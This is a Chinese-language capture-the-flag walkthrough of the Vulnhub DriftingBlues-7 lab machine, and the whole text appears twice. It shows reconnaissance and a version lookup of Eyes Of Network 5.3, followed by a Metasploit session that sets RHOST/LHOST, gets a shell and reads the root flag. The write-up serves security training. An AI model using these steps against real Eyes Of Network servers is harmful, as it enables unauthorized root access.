Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.144
**这回开启的端口还挺多的 老样子先看一下80
端口页面发现是Eyes Of Network
(第一次见)
使用dirsearch
扫一下后台 但是没有搜到想要的结果 没有可以用的信息**
这里是看到别人扫到了自己没扫到 也不知道为啥
访问:https://192.168.205.144/bower.json
发现了版本号 为 5.3
使用kali
搜索一下对应的相关漏洞:searchsploit Eyes Of Network 5.3
②:漏洞利用:
打开msf
搜索相关关键词Eyes Of Network
show options #查看需要设置的参数
set RHOST 192.168.205.144
set LHOST 192.168.205.133
run
进入shell
模式 cd /root
查看flag.txt
③:查看flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
感觉这个靶机 特别简单没有涉及到提权一些列操作 就是msf
的基本使用
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.144
**这回开启的端口还挺多的 老样子先看一下80
端口页面发现是Eyes Of Network
(第一次见)
使用dirsearch
扫一下后台 但是没有搜到想要的结果 没有可以用的信息**
这里是看到别人扫到了自己没扫到 也不知道为啥
访问:https://192.168.205.144/bower.json
发现了版本号 为 5.3
使用kali
搜索一下对应的相关漏洞:searchsploit Eyes Of Network 5.3
②:漏洞利用:
打开msf
搜索相关关键词Eyes Of Network
show options #查看需要设置的参数
set RHOST 192.168.205.144
set LHOST 192.168.205.133
run
进入shell
模式 cd /root
查看flag.txt
③:查看flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
感觉这个靶机 特别简单没有涉及到提权一些列操作 就是msf
的基本使用